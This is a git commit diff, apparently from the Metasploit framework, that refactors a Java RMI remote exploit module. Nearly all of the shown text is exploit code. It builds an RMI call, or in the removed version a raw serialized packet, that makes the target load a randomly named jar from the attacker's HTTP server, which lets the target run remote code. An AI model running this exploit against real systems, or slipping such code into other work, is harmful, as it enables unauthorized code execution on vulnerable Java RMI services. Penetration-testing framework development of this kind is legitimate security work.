Refactor exploit module
jvazquez-r7
parent
956bf0c8f9
commit
873ade3b8a
|
|
@ -62,9 +62,9 @@ module Msf
|
|||
nsock = opts[:sock] || sock
|
||||
stream = build_call(opts)
|
||||
nsock.put(stream.encode)
|
||||
return_data = Rex::Proto::Rmi::Model::ReturnData.decode(nsock)
|
||||
#return_data = Rex::Proto::Rmi::Model::ReturnData.decode(nsock)
|
||||
|
||||
return_data.return_value
|
||||
#return_data.return_value
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
|||
|
|
@ -8,7 +8,7 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Rmi::Client
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
|
|
@ -113,44 +113,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def primer
|
||||
print_status("#{peer} - Sending RMI Header...")
|
||||
connect
|
||||
begin
|
||||
send_header
|
||||
rescue ::RuntimeError
|
||||
print_error("#{peer} - Filed to negotiate RMI protocol")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
# Determine if the instance allows remote class loading
|
||||
print_status("#{peer} - Sending RMI Call...")
|
||||
jar = rand_text_alpha(rand(8)+1) + '.jar'
|
||||
old_url = "file:./rmidummy.jar"
|
||||
new_url = get_uri + '/' + jar
|
||||
packet = gen_rmi_packet
|
||||
# Java strings in serialized data are prefixed with a 2-byte, big endian length
|
||||
# (at least, as long as they are shorter than 65536 bytes)
|
||||
find_me = [old_url.length].pack("n") + old_url
|
||||
idx = packet.index(find_me)
|
||||
len = [new_url.length].pack("n")
|
||||
# Now replace it with the new url
|
||||
packet[idx, find_me.length] = len + new_url
|
||||
|
||||
# write out minimal header and packet
|
||||
print_status("#{peer} - Connected and sending request for #{new_url}")
|
||||
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
||||
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet)
|
||||
|
||||
buf = ""
|
||||
1.upto(6) do
|
||||
res = sock.get_once(-1, 5) rescue nil
|
||||
break unless res
|
||||
break if session_created?
|
||||
buf << res
|
||||
begin
|
||||
return_data = send_call(call_data: build_gc_call_data(new_url))
|
||||
rescue ::RuntimeError
|
||||
fail_with(Failure::Unknown, "#{peer} - Failed to send RMI Call, anyway JAVA RMI Endpoint detected")
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
if buf =~ /RMI class loader disabled/
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - The RMI class loader is disabled")
|
||||
end
|
||||
|
||||
if buf =~ /java.lang.ClassNotFoundException/
|
||||
fail_with(Failure::Unknown, "#{peer} - The RMI class loader couldn't find the payload")
|
||||
end
|
||||
|
||||
print_good("#{peer} - Target may be exploitable...")
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
|
@ -175,20 +158,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
|
||||
def gen_rmi_packet
|
||||
"\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x02\x00" +
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
||||
"\x00\xf6\xb6\x89\x8d\x8b\xf2\x86\x43\x75\x72\x00\x18\x5b\x4c\x6a" +
|
||||
"\x61\x76\x61\x2e\x72\x6d\x69\x2e\x73\x65\x72\x76\x65\x72\x2e\x4f" +
|
||||
"\x62\x6a\x49\x44\x3b\x87\x13\x00\xb8\xd0\x2c\x64\x7e\x02\x00\x00" +
|
||||
"\x70\x78\x70\x00\x00\x00\x00\x77\x08\x00\x00\x00\x00\x00\x00\x00" +
|
||||
"\x00\x73\x72\x00\x14\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x2e" +
|
||||
"\x52\x4d\x49\x4c\x6f\x61\x64\x65\x72\xa1\x65\x44\xba\x26\xf9\xc2" +
|
||||
"\xf4\x02\x00\x00\x74\x00\x13\x66\x69\x6c\x65\x3a\x2e\x2f\x72\x6d" +
|
||||
"\x69\x64\x75\x6d\x6d\x79\x2e\x6a\x61\x72\x78\x70\x77\x01\x00\x0a"
|
||||
end
|
||||
|
||||
def autofilter
|
||||
return true
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue